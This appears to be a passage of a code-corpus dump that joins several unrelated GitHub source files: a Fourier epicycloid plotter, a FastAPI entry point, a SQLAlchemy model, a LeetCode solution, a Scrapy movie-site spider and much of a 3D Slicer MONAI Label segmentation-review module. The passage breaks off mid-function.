y.\")\n xs = list(map(lambda z: z.real, zs))\n ys = list(map(lambda z: z.imag, zs))\n\n print(\"Affichage des courbes.\")\n plt.subplot(2, 1, 1)\n plt.scatter(ptsx, ptsy, s=1)\n plt.subplot(2, 1, 2)\n plt.scatter(xs, ys, s=1)\n plt.show()\n\n # Pour s'assurer que la fenêtre du graphique est bien fermée.\n sleep(0.2)\n\n print(\"Affichage des instructions et de l'équation de l'épicycloïde.\")\n geogebra(pts, T, nb_cercles, rayon_minimal)\n print(equation(pts, T, nb_cercles, rayon_minimal))\n\n","repo_name":"gabriel-doriath-dohler/Convertisseur-en-epicycloide","sub_path":"fourier.py","file_name":"fourier.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"31538139743","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom api.routers import api\nfrom api.settings import settings\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\",\n]\n\nif settings.is_dev:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\napp.include_router(api.router)\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n","repo_name":"Lazytangent/Qwerkey","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"54"} +{"seq_id":"37866431992","text":"#!/bin/usr/python3\n'''Defines a state model'''\n\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\nclass State(Base):\n '''instanciating class states.'''\n __tablename__ = 'states'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(128), nullable=False)\n","repo_name":"Erickkaranja/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/model_state.py","file_name":"model_state.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2800775662","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n fake_head = ListNode(0)\n tmp_node = fake_head\n for i in range(n):\n tmp_node.next = ListNode(0)\n tmp_node = tmp_node.next\n pre_head = tmp_node\n tmp_node.next = head\n pos1 = fake_head\n pos2 = head\n while pos2 is not None:\n pos1 = pos1.next\n pos2 = pos2.next\n pos1.next = pos1.next.next\n return pre_head.next","repo_name":"Vspick/python_interview","sub_path":"leetcode/remove-nth-node-from-end-of-list.py","file_name":"remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11548085252","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.http import Request\n\nfrom renrenyingshi.items import RenrenDetailItem\n\nclass RenrenSpider(CrawlSpider):\n name = 'renren'\n allowed_domains = ['zimuzu.tv']\n start_urls = ['http://www.zimuzu.tv/resourcelist',]\n rules = (\n Rule(LinkExtractor(\n allow=r'/resourcelist/\\?page=\\d+&channel=&area=&category=&year=&tvstation=&sort='),\n callback='parse_movie_list', follow=True, process_links='movie_list_url'),\n )\n\n def parse_movie_list(self, response):\n \"\"\"解析电影列表页\n \"\"\"\n movies = response.xpath(\n \".//div[@class='resource-showlist has-point']/ul/li[@class='clearfix']\")\n for movie in movies:\n url = movie.xpath(\n \"./div[@class='fl-img']/a/@href\").extract_first()\n movie_url = r'http://www.zimuzu.tv%s' % url\n movie_id = movie_url.split(r'/')[-1]\n request = scrapy.Request(\n url=movie_url, callback=self.parse_movie_detail)\n request.meta['movie_id'] = movie_id\n yield request\n\n def parse_movie_detail(self, response):\n \"\"\"解析电影内容页\n \"\"\"\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n title = response.xpath(\n \"//div[@class='resource-tit']/h2/text()\").extract_first().strip('\"')\n movie_id = response.meta['movie_id']\n movie_url = response.url\n name = response.xpath(\n \".//div[@class='fl-info']/ul/li[1]/strong/text()\").extract_first()\n local = response.xpath(\n \".//div[@class='fl-info']/ul/li[2]/strong/text()\").extract_first()\n language = response.xpath(\n \".//div[@class='fl-info']/ul/li[3]/strong/text()\").extract_first()\n premiere = response.xpath(\n \".//div[@class='fl-info']/ul/li[4]/strong/text()\").extract_first()\n company = response.xpath(\n \".//div[@class='fl-info']/ul/li[5]/strong/text()\").extract_first()\n if company is None:\n company = u'未知'\n types = response.xpath(\n \".//div[@class='fl-info']/ul/li[6]/strong/text()\").extract_first()\n renren_detail_item = RenrenDetailItem(\n title=title, movie_id=movie_id, movie_url=movie_url, name=name,\n local=local,language=language, premiere=premiere, company=company,\n types=types,\n )\n yield renren_detail_item\n\n def movie_list_url(self, url_list):\n \"\"\"补全链接地址\n \"\"\"\n new_url_list = []\n if url_list is None:\n return\n for l in url_list:\n new_url = r'http://www.zimuzu.tv%s' % l\n new_url_list.append(new_url)\n return new_url_list\n","repo_name":"sealionking/renrenspider","sub_path":"renrenyingshi/renrenyingshi/spiders/renren_spider.py","file_name":"renren_spider.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39563673981","text":"import datetime\nimport logging\nimport os\nimport re\nimport tempfile\nfrom typing import Dict, List\n\nimport qt\nimport requests\nimport SampleData\nimport slicer\nfrom MONAILabelReviewerLib.ImageData import ImageData\nfrom MONAILabelReviewerLib.ImageDataController import ImageDataController\nfrom MONAILabelReviewerLib.MONAILabelReviewerEnum import Level, SegStatus\nfrom slicer.ScriptedLoadableModule import *\nfrom slicer.util import VTKObservationMixin\n\n\nclass MONAILabelReviewer(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"MONAILabel Reviewer\"\n self.parent.categories = [\"Active Learning\"]\n self.parent.dependencies = []\n self.parent.contributors = [\"Minh Duc, Do (rAIdiance)\"]\n self.parent.helpText = \"\"\"\nThis module provides the user to review on segmentations on X-Ray-dicom images.\nSee more information in module documentation.\n\"\"\"\n self.parent.acknowledgementText = \"\"\"\nDeveloped by rAiDiance, and funded by Berlin Institute of Health (BIH).\n\"\"\"\n\n\nclass MONAILabelReviewerWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None\n self._parameterNode = None\n self._updatingGUIFromParameterNode = False\n\n self.STATUS = SegStatus()\n self.LEVEL = Level()\n\n self.selectedReviewer: str = \"\"\n self.selectedClientId: str = \"\"\n self.listImageData: List[ImageData] = None\n self.imageCounter: int = 0\n self.currentImageData: ImageData = None\n self.idToimageData: Dict[str, ImageData] = None\n\n # Meta Information\n self.finalStatus: str = \"\"\n self.finalLevel: str = \"\"\n self.finalComment: str = \"\"\n\n self.reviewersModeIsActive = False\n\n self.mapFiltersToBool: Dict[str, bool] = {\n \"segmented\": False,\n \"notSegemented\": False,\n \"approved\": False,\n \"flagged\": False,\n }\n\n def setup(self):\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.setup(self)\n\n # Load widget from .ui file (created by Qt Designer).\n # Additional widgets can be instantiated manually and added to self.layout.\n uiWidget = slicer.util.loadUI(self.resourcePath(\"UI/MONAILabelReviewer.ui\"))\n self.layout.addWidget(uiWidget)\n self.ui = slicer.util.childWidgetVariables(uiWidget)\n\n # Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\n uiWidget.setMRMLScene(slicer.mrmlScene)\n\n # Create logic class. Logic implements all computations that should be possible to run\n # in batch mode, without a graphical user interface.\n self.logic = MONAILabelReviewerLogic()\n\n self.setLightVersion()\n self.segmentEditorWidget = slicer.qMRMLSegmentEditorWidget()\n self.addSegmentator()\n self.ui.verticalLayout_10.addWidget(self.segmentEditorWidget)\n self.loadServerSelection()\n\n # Section: Widget Elements\n self.ui.btn_connect_monai.clicked.connect(self.init_dicom_stream)\n self.ui.btn_load.clicked.connect(self.loadImageData)\n\n self.ui.btn_approved.clicked.connect(self.approveSegmentation)\n self.ui.btn_mark_revision.clicked.connect(self.flagSegmentation)\n\n self.ui.btn_next.clicked.connect(self.getNextSegmentation)\n self.ui.btn_previous.clicked.connect(self.getPreviousSegmenation)\n\n self.ui.btn_easy.clicked.connect(self.setEasy)\n self.ui.btn_medium.clicked.connect(self.setMedium)\n self.ui.btn_hard.clicked.connect(self.setHard)\n\n self.ui.btn_search.clicked.connect(self.search)\n self.ui.btn_search_annotator_reviewer.clicked.connect(self.searchByAnnotatorReviewer)\n self.ui.btn_search_level.clicked.connect(self.searchByLevel)\n\n self.ui.checkBox_search_approved.clicked.connect(self.checkedAppprovedSearch)\n self.ui.checkBox_search_flagged.clicked.connect(self.checkedFlaggedSearch)\n\n self.ui.btn_show_image.clicked.connect(self.showSearchedImage)\n\n self.ui.checkBox_flagged.clicked.connect(self.checkedFlagged)\n self.ui.checkBox_approved.clicked.connect(self.checkApproved)\n self.ui.checkBox_not_segmented.clicked.connect(self.checkNotSegmented)\n self.ui.checkBox_segmented.clicked.connect(self.checkSegmented)\n\n self.ui.btn_basic_mode.clicked.connect(self.setLightVersion)\n self.ui.btn_reviewers_mode.clicked.connect(self.setReviewerVersion)\n self.ui.comboBox_clients.currentIndexChanged.connect(self.index_changed)\n self.ui.comboBox_reviewers.currentIndexChanged.connect(self.indexReviewerchanged)\n\n def getCurrentTime(self):\n return datetime.datetime.now()\n\n def cleanup(self):\n \"\"\"\n Called when the application closes and the module widget is destroyed.\n \"\"\"\n self.removeObservers()\n\n def indexReviewerchanged(self, index):\n logging.info(f\"{self.getCurrentTime()}: Selected reviewer: '{self.ui.comboBox_reviewers.currentText}'\")\n self.selectedReviewer = self.ui.comboBox_reviewers.currentText\n\n def index_changed(self, index):\n self.loadImageData()\n\n def setReviewerVersion(self):\n self.reviewersModeIsActive = True\n # section: Server\n # Reviewer Field\n self.ui.label_20.show()\n self.ui.comboBox_reviewers.show()\n\n # Approved bar\n self.ui.label_17.show()\n self.ui.progressBar_approved_total.show()\n self.ui.label_idx_appr_image.show()\n\n # section: Data set explorer\n\n # Approved bar\n self.ui.label_10.show()\n self.ui.progressBar_approved_client.show()\n self.ui.label_idx_appr_image_client.show()\n\n # filter option\n self.ui.label_6.show()\n self.ui.checkBox_not_segmented.show()\n self.ui.checkBox_flagged.show()\n self.ui.checkBox_segmented.show()\n self.ui.checkBox_approved.show()\n\n # section: Data evaluation\n self.ui.btn_easy.show()\n self.ui.btn_medium.show()\n self.ui.btn_hard.show()\n self.ui.label_level_difficulty.show()\n self.ui.btn_mark_revision.show()\n self.ui.btn_approved.show()\n\n # imag information\n self.ui.label_14.show()\n self.ui.lineEdit_status.show()\n self.ui.label_16.show()\n self.ui.lineEdit_level.show()\n self.ui.plainText_comment.show()\n if self.ui.btn_basic_mode.isChecked():\n self.ui.btn_basic_mode.setChecked(False)\n\n self.collapseAllSecions()\n\n # Section: Light version Option\n\n def setLightVersion(self):\n self.reviewersModeIsActive = False\n # section: Server\n # Reviewer Field\n self.ui.label_20.hide()\n self.ui.comboBox_reviewers.hide()\n\n # Approved bar\n self.ui.label_17.hide()\n self.ui.progressBar_approved_total.hide()\n self.ui.label_idx_appr_image.hide()\n\n # section: Data set explorer\n\n # Approved bar\n self.ui.label_10.hide()\n self.ui.progressBar_approved_client.hide()\n self.ui.label_idx_appr_image_client.hide()\n\n # filter option\n self.ui.label_6.hide()\n self.ui.checkBox_not_segmented.hide()\n self.ui.checkBox_flagged.hide()\n self.ui.checkBox_segmented.hide()\n self.ui.checkBox_approved.hide()\n\n # section: Data evaluation\n self.ui.btn_easy.hide()\n self.ui.btn_medium.hide()\n self.ui.btn_hard.hide()\n self.ui.label_level_difficulty.hide()\n self.ui.btn_mark_revision.hide()\n self.ui.btn_approved.hide()\n\n # imag information\n self.ui.label_14.hide()\n self.ui.lineEdit_status.hide()\n self.ui.label_16.hide()\n self.ui.lineEdit_level.hide()\n self.ui.plainText_comment.hide()\n if self.ui.btn_reviewers_mode.isChecked():\n self.ui.btn_reviewers_mode.setChecked(False)\n\n self.collapseAllSecions()\n\n def cleanCache(self):\n self.logic = MONAILabelReviewerLogic()\n self.selectedReviewer = \"\"\n self.selectedClientId = \"\"\n self.listImageData = None\n self.imageCounter = 0\n self.currentImageData = None\n self.idToimageData = None\n\n # Meta Information\n self.finalStatus = \"\"\n self.finalLevel = \"\"\n self.finalComment = \"\"\n logging.info(f\"{self.getCurrentTime()}: Cache is cleaned\")\n\n # Section: Server\n def loadServerSelection(self):\n settings = qt.QSettings()\n serverUrlHistory = settings.value(\"MONAILabel/serverUrlHistory\")\n\n self.ui.comboBox_server_url.clear()\n self.ui.comboBox_server_url.addItems(serverUrlHistory.split(\";\"))\n\n def init_dicom_stream(self):\n \"\"\"\n initiates connection to monai server\n Default: client listens on \"http://127.0.0.1:8000\"\n \"\"\"\n # Check Connection\n self.cleanCache()\n serverUrl: str = self.ui.comboBox_server_url.currentText\n isConnected: bool = self.logic.connectToMonaiServer(serverUrl)\n if not isConnected:\n warningMessage = f\"Connection to server failed \\ndue to invalid ip '{serverUrl}'\"\n slicer.util.warningDisplay(warningMessage)\n return\n result = self.logic.initMetaDataProcessing()\n if result is False:\n warningMessage = (\n \"Request for datastore-info failed.\\nPlease check if server address is correct \\n('{}')!\".format(\n serverUrl\n )\n )\n slicer.util.warningDisplay(warningMessage)\n return\n self.initUI()\n\n def collapseAllSecions(self):\n self.ui.collapsibleButton_search_image.enabled = False\n self.ui.collapsibleButton_dicom_stream.enabled = False\n self.ui.collapsibleButton_dicom_evaluation.enabled = False\n\n self.ui.collapsibleButton_search_image.collapsed = True\n self.ui.collapsibleButton_dicom_stream.collapsed = True\n self.ui.collapsibleButton_dicom_evaluation.collapsed = True\n\n def initUI(self):\n\n self.selectedReviewer = self.ui.comboBox_reviewers.currentText\n if self.reviewersModeIsActive and self.selectedReviewer == \"\":\n warningMessage = \"Missing reviewer's name.\\nPlease enter your id or name in the reviewer's field!\"\n slicer.util.warningDisplay(warningMessage)\n return\n self.ui.collapsibleButton_search_image.enabled = True\n self.ui.collapsibleButton_dicom_stream.enabled = True\n\n # set Segmentation progress bar\n self.setProgessBar()\n\n # fill combobox\n self.fillComboBoxes()\n\n # set up buttons\n self.setButtons()\n\n self.selectedClientId = \"\"\n\n def setButtons(self):\n self.ui.btn_approved.setCheckable(True)\n self.ui.btn_mark_revision.setCheckable(True)\n self.ui.btn_easy.setCheckable(True)\n self.ui.btn_medium.setCheckable(True)\n self.ui.btn_hard.setCheckable(True)\n self.ui.btn_reviewers_mode.setCheckable(True)\n self.ui.btn_basic_mode.setCheckable(True)\n self.ui.btn_show_image.enabled = False\n\n def setProgessBar(self):\n progessBarData = self.logic.getStatistics()\n self.ui.progressBar_segmentation.setProperty(\"value\", progessBarData[\"segmentationProgress\"])\n self.ui.label_idx_seg_image.setText(progessBarData[\"idxTotalSegmented\"])\n self.ui.label_idx_appr_image.setText(progessBarData[\"idxTotalApproved\"])\n self.ui.progressBar_approved_total.setProperty(\"value\", progessBarData[\"progressPercentage\"])\n\n def fillComboBoxes(self):\n # clients\n clientIds = self.logic.getClientIds()\n\n self.ui.comboBox_clients.clear()\n self.ui.comboBox_clients.addItem(\"All\")\n for clientId in clientIds:\n self.ui.comboBox_clients.addItem(str(clientId))\n\n # combobox in search section\n self.ui.comboBox_search_annotator.clear()\n self.ui.comboBox_search_annotator.addItem(\"All\")\n for clientId in clientIds:\n self.ui.comboBox_search_annotator.addItem(str(clientId))\n\n # reviewers\n reviewers = self.logic.getReviewers()\n self.ui.comboBox_reviewers.addItem(self.selectedReviewer)\n for reviewer in reviewers:\n if reviewer == self.selectedReviewer:\n continue\n self.ui.comboBox_reviewers.addItem(str(reviewer))\n\n # combobox in search section\n self.ui.comboBox_search_reviewer.addItem(\"All\")\n for reviewer in reviewers:\n self.ui.comboBox_search_reviewer.addItem(str(reviewer))\n\n def cleanDicomStreamSection(self):\n self.finalStatus = \"\"\n self.finalLevel = \"\"\n self.finalComment = \"\"\n\n self.selectedClientId = None\n self.imageCounter = 0\n self.currentImageData = None\n self.idToimageData = None\n self.listImageData = None\n\n self.cleanProgressBarDicomStreamSection()\n self.cleanCheckBoxes()\n self.resetHorizontalSlider()\n\n # Section: Loading images\n def loadImageData(self):\n if (self.selectedClientId == self.ui.comboBox_clients.currentText) and (self.isDifferentFilter() is False):\n return\n self.imageCounter = 0\n\n self.cleanSearchSection()\n # select segmentator: ALL\n self.selectedClientId = self.ui.comboBox_clients.currentText\n if self.selectedClientId == \"All\":\n self.listImageData = self.loadImageDataWithFilter(selectedClientId=\"\")\n self.ui.checkBox_segmented.setEnabled(True)\n self.ui.checkBox_not_segmented.setEnabled(True)\n self.setProgressBarOfAll()\n\n # select segmentator: client was selected\n if self.selectedClientId != \"All\":\n self.listImageData = self.loadImageDataWithFilter(selectedClientId=self.selectedClientId)\n self.setCheckBoxesClient()\n self.setProgressBarOfClient(self.selectedClientId)\n\n logging.info(\n \"{}: Successfully loaded Image data [total = {}, category = '{}']\".format(\n self.getCurrentTime(), len(self.listImageData), self.selectedClientId\n )\n )\n\n if len(self.listImageData) > 0:\n self.currentImageData = self.listImageData[self.imageCounter]\n self.loadNextImage(self.currentImageData)\n\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.ui.collapsibleButton_dicom_evaluation.collapsed = False\n self.setHorizontalSlider(len(self.listImageData))\n self.collectFilters()\n self.setLoadButtonColor(reload=False)\n\n def loadImageDataWithFilter(self, selectedClientId: str) -> list:\n isApproved = bool(self.ui.checkBox_approved.isChecked())\n isFlagged = bool(self.ui.checkBox_flagged.isChecked())\n isNotSegmented = bool(self.ui.checkBox_not_segmented.isChecked())\n segmented = bool(self.ui.checkBox_segmented.isChecked())\n logging.info(\n \"{}: Selected filters: segmented= {} | isNotSegmented= {} | isApproved= {} | isFlagged= {}\".format(\n self.getCurrentTime(), segmented, isNotSegmented, isApproved, isFlagged\n )\n )\n if selectedClientId == \"\":\n return self.logic.getAllImageData(segmented, isNotSegmented, isApproved, isFlagged)\n return self.logic.getImageDataByClientId(selectedClientId, isApproved, isFlagged)\n\n def setProgressBarOfAll(self):\n progessBarData = self.logic.getStatistics()\n # Progress bar: Segmented/TotalImage\n self.ui.progressBar_segmented_client.setProperty(\"value\", progessBarData[\"segmentationProgressAllPercentage\"])\n self.ui.label_idx_seg_image_client.setText(progessBarData[\"idxTotalSegmented\"])\n # Progress bar: approvalCount/TotalImage\n self.ui.progressBar_approved_client.setProperty(\"value\", progessBarData[\"approvalProgressPercentage\"])\n self.ui.label_idx_appr_image_client.setText(progessBarData[\"idxTotalApproved\"])\n\n def cleanProgressBarDicomStreamSection(self):\n self.ui.progressBar_segmented_client.setProperty(\"value\", 0)\n self.ui.progressBar_approved_client.setProperty(\"value\", 0)\n self.ui.label_idx_seg_image_client.setText(\"x/y\")\n self.ui.label_idx_appr_image_client.setText(\"x/y\")\n\n def setLoadButtonColor(self, reload: bool):\n if reload: # reload required\n self.ui.btn_load.setStyleSheet(\"background-color : rgb(169, 169, 169)\")\n return\n self.ui.btn_load.setStyleSheet(\"background-color : rgb(0, 144, 81)\")\n\n def setProgressBarOfClient(self, selectedClientId: str):\n percentageApprovedOfClient, idxApprovedOfClient = self.logic.getPercentageApproved(selectedClientId)\n self.ui.progressBar_approved_client.setProperty(\"value\", percentageApprovedOfClient)\n self.ui.label_idx_appr_image_client.setText(idxApprovedOfClient)\n\n percentageSemgmentedByClient, idxSegmentedByClient = self.logic.getPercentageSemgmentedByClient(\n selectedClientId\n )\n self.ui.progressBar_segmented_client.setProperty(\"value\", percentageSemgmentedByClient)\n self.ui.label_idx_seg_image_client.setText(idxSegmentedByClient)\n\n def setHorizontalSlider(self, loadesImageCount: int):\n self.ui.horizontalSlider_image_idx.setMinimum(0)\n self.ui.horizontalSlider_image_idx.setMaximum(loadesImageCount - 1)\n idxImage = f\"Image: {self.imageCounter + 1}/{len(self.listImageData)}\"\n self.ui.label_idx_image.setText(idxImage)\n\n def updateHorizontalSlider(self):\n self.ui.horizontalSlider_image_idx.setValue(self.imageCounter)\n idxImage = f\"Image: {self.imageCounter + 1}/{len(self.listImageData)}\"\n self.ui.label_idx_image.setText(idxImage)\n\n def resetHorizontalSlider(self):\n self.ui.horizontalSlider_image_idx.setValue(1)\n self.ui.label_idx_image.setText(\"Image:\")\n\n # Section: Filter\n def collectFilters(self):\n self.mapFiltersToBool[\"segmented\"] = self.ui.checkBox_segmented.isChecked()\n self.mapFiltersToBool[\"notSegemented\"] = self.ui.checkBox_not_segmented.isChecked()\n self.mapFiltersToBool[\"approved\"] = self.ui.checkBox_approved.isChecked()\n self.mapFiltersToBool[\"flagged\"] = self.ui.checkBox_flagged.isChecked()\n\n def isDifferentFilter(self) -> bool:\n if self.mapFiltersToBool[\"segmented\"] != self.ui.checkBox_segmented.isChecked():\n return True\n if self.mapFiltersToBool[\"notSegemented\"] != self.ui.checkBox_not_segmented.isChecked():\n return True\n if self.mapFiltersToBool[\"approved\"] != self.ui.checkBox_approved.isChecked():\n return True\n if self.mapFiltersToBool[\"flagged\"] != self.ui.checkBox_flagged.isChecked():\n return True\n return False\n\n # CheckBox: clean\n def cleanCheckBoxes(self):\n self.ui.checkBox_segmented.setChecked(False)\n self.ui.checkBox_not_segmented.setChecked(False)\n self.ui.checkBox_flagged.setChecked(False)\n self.ui.checkBox_approved.setChecked(False)\n\n # CheckBox: flagged\n def setCheckBoxesClient(self):\n self.setLoadButtonColor(reload=True)\n self.ui.checkBox_not_segmented.setEnabled(False)\n self.ui.checkBox_segmented.setChecked(True)\n self.ui.checkBox_segmented.setEnabled(False)\n\n # CheckBox: flagged\n def checkedFlagged(self):\n self.setLoadButtonColor(reload=True)\n self.ui.checkBox_segmented.setChecked(True)\n if self.ui.checkBox_approved.isChecked():\n self.ui.checkBox_approved.setChecked(False)\n if self.ui.checkBox_not_segmented.isChecked():\n self.ui.checkBox_not_segmented.setChecked(False)\n\n # CheckBox: approved\n def checkApproved(self):\n self.setLoadButtonColor(reload=True)\n self.ui.checkBox_segmented.setChecked(True)\n if self.ui.checkBox_flagged.isChecked():\n self.ui.checkBox_flagged.setChecked(False)\n if self.ui.checkBox_not_segmented.isChecked():\n self.ui.checkBox_not_segmented.setChecked(False)\n\n # CheckBox: NOT segmented\n def checkNotSegmented(self):\n self.setLoadButtonColor(reload=True)\n if self.ui.checkBox_approved.isChecked():\n self.ui.checkBox_approved.setChecked(False)\n if self.ui.checkBox_flagged.isChecked():\n self.ui.checkBox_flagged.setChecked(False)\n if self.ui.checkBox_segmented.isChecked():\n self.ui.checkBox_segmented.setChecked(False)\n\n # CheckBox: segmented\n def checkSegmented(self):\n self.setLoadButtonColor(reload=True)\n if self.ui.checkBox_segmented.isChecked() is False:\n self.ui.checkBox_approved.setChecked(False)\n self.ui.checkBox_flagged.setChecked(False)\n return\n\n if self.ui.checkBox_not_segmented.isChecked():\n self.ui.checkBox_not_segmented.setChecked(False)\n\n # Section: Search Image\n def cleanSearchSection(self):\n self.ui.tableWidge_imageMeta.setRowCount(0)\n self.ui.tableWidge_imageMeta.clearContents()\n self.ui.textEdit_search.clear()\n\n def search(self):\n \"\"\"\n After triggering search button, load images and segmentation by input ids\n \"\"\"\n self.cleanDicomStreamSection()\n\n if self.ui.textEdit_search.toPlainText() == \"\":\n logging.info(f\"{self.getCurrentTime()}: Search input field is empty\")\n return\n\n idsStr = self.ui.textEdit_search.toPlainText()\n idList = self.getIdsFromString(idsStr)\n\n self.idToimageData = self.logic.getMultImageDataByIds(idList)\n self.listImageData = [*self.idToimageData.values()]\n\n foundIdList = [imageData.getName() for imageData in self.listImageData]\n notFoundIdList = [id for id in idList if (id not in foundIdList)]\n self.loadSearchImageMetaInTable(self.listImageData, notFoundIdList)\n\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.setHorizontalSlider(len(foundIdList))\n if len(foundIdList) > 0:\n self.setSearchResultMessage(numOfFound=len(foundIdList))\n self.loadFirstImage()\n else:\n self.setSearchResultMessage(numOfFound=0)\n\n def searchByAnnotatorReviewer(self):\n selectedAnnotator: str = self.ui.comboBox_search_annotator.currentText\n selectedReviewer: str = self.ui.comboBox_search_reviewer.currentText\n isApproved: bool = bool(self.ui.checkBox_search_approved.isChecked())\n isFlagged: bool = bool(self.ui.checkBox_search_flagged.isChecked())\n\n self.idToimageData = self.logic.searchByAnnotatorReviewer(\n selectedAnnotator, selectedReviewer, isApproved, isFlagged\n )\n self.listImageData = [*self.idToimageData.values()]\n\n self.loadSearchImageMetaInTable(self.listImageData, [])\n if len(self.listImageData) > 0:\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.setSearchResultMessage(numOfFound=len(self.idToimageData))\n self.setHorizontalSlider(len(self.idToimageData))\n self.loadFirstImage()\n else:\n self.setSearchResultMessage(numOfFound=0)\n\n def searchByLevel(self):\n isEasy: bool = bool(self.ui.checkBox_search_easy.isChecked())\n isMedium: bool = bool(self.ui.checkBox_search_medium.isChecked())\n isHard: bool = bool(self.ui.checkBox_search_hard.isChecked())\n\n self.idToimageData = self.logic.searchByLevel(isEasy, isMedium, isHard)\n self.listImageData = [*self.idToimageData.values()]\n\n self.loadSearchImageMetaInTable(self.listImageData, [])\n if len(self.listImageData) > 0:\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.setSearchResultMessage(numOfFound=len(self.idToimageData))\n self.setHorizontalSlider(len(self.idToimageData))\n self.loadFirstImage()\n else:\n self.setSearchResultMessage(numOfFound=0)\n\n def setSearchResultMessage(self, numOfFound: int):\n if numOfFound == 0:\n self.ui.label_search_result.setText(\"Result: No images found.\")\n self.ui.label_search_result.setStyleSheet(\"color: red\")\n else:\n resultMessage = f\"Result: {numOfFound} images found.\"\n self.ui.label_search_result.setText(resultMessage)\n self.ui.label_search_result.setStyleSheet(\"color: green\")\n\n def checkedAppprovedSearch(self):\n isFlagged: bool = bool(self.ui.checkBox_search_flagged.isChecked())\n if isFlagged:\n self.ui.checkBox_search_flagged.setChecked(False)\n\n def checkedFlaggedSearch(self):\n isApproved: bool = bool(self.ui.checkBox_search_approved.isChecked())\n if isApproved:\n self.ui.checkBox_search_approved.setChecked(False)\n\n def loadSearchImageMetaInTable(self, foundlist: List[ImageData], notFoundIdList: List[str]):\n \"\"\"\n Set table content after triggering button \"show\"\n Parameters:\n foundlist (list): list contains found ids\n notFoundIdList (list): list contains not found ids\n \"\"\"\n rowCount = len(foundlist) + len(notFoundIdList)\n self.ui.tableWidge_imageMeta.setRowCount(rowCount)\n rowCounter = 0\n for row, imageData in enumerate(foundlist):\n self.ui.tableWidge_imageMeta.setItem(row, 0, qt.QTableWidgetItem(imageData.getName()))\n self.ui.tableWidge_imageMeta.setItem(row, 1, qt.QTableWidgetItem(\"Yes\"))\n self.ui.tableWidge_imageMeta.setItem(row, 2, qt.QTableWidgetItem(str(imageData.isSegemented())))\n rowCounter += 1\n\n for row, notFoundId in enumerate(notFoundIdList):\n self.ui.tableWidge_imageMeta.setItem(rowCounter, 0, qt.QTableWidgetItem(notFoundId))\n self.ui.tableWidge_imageMeta.setItem(rowCounter, 1, qt.QTableWidgetItem(\"No\"))\n self.ui.tableWidge_imageMeta.setItem(rowCounter, 2, qt.QTableWidgetItem(\"No\"))\n rowCounter += 1\n\n self.ui.btn_show_image.enabled = True\n\n def loadFirstImage(self):\n self.imageCounter = 0\n self.currentImageData = self.listImageData[self.imageCounter]\n self.loadNextImage(self.currentImageData)\n # self.imageCounter += 1\n self.updateHorizontalSlider()\n\n def showSearchedImage(self):\n \"\"\"\n displays dicom & segmentation to corresponding selected row in listed ids\n \"\"\"\n selectedRow = self.ui.tableWidge_imageMeta.currentRow()\n if selectedRow == -1:\n return\n selectedImageId = self.ui.tableWidge_imageMeta.item(selectedRow, 0).text()\n\n if selectedImageId not in self.idToimageData:\n logging.info(f\"{self.getCurrentTime()}: Selected image id [id = {selectedImageId}] was not found\")\n return\n self.currentImageData = self.idToimageData[selectedImageId]\n self.loadNextImage(self.currentImageData)\n\n def removeAllWhiteSpaces(self, strChain) -> str:\n \"\"\"\n removes white spaces within string\n \"\"\"\n pattern = r\"\\s+\"\n return re.sub(pattern, \"\", strChain)\n\n def getIdsFromString(self, idStr: str) -> List[str]:\n \"\"\"\n parses string which contains comma seperated ids\n Parameters:\n idStr (str): string which contains comma seperated ids\n Returns:\n list: contains ids\n \"\"\"\n cleanedStr = self.removeAllWhiteSpaces(idStr)\n idsList = 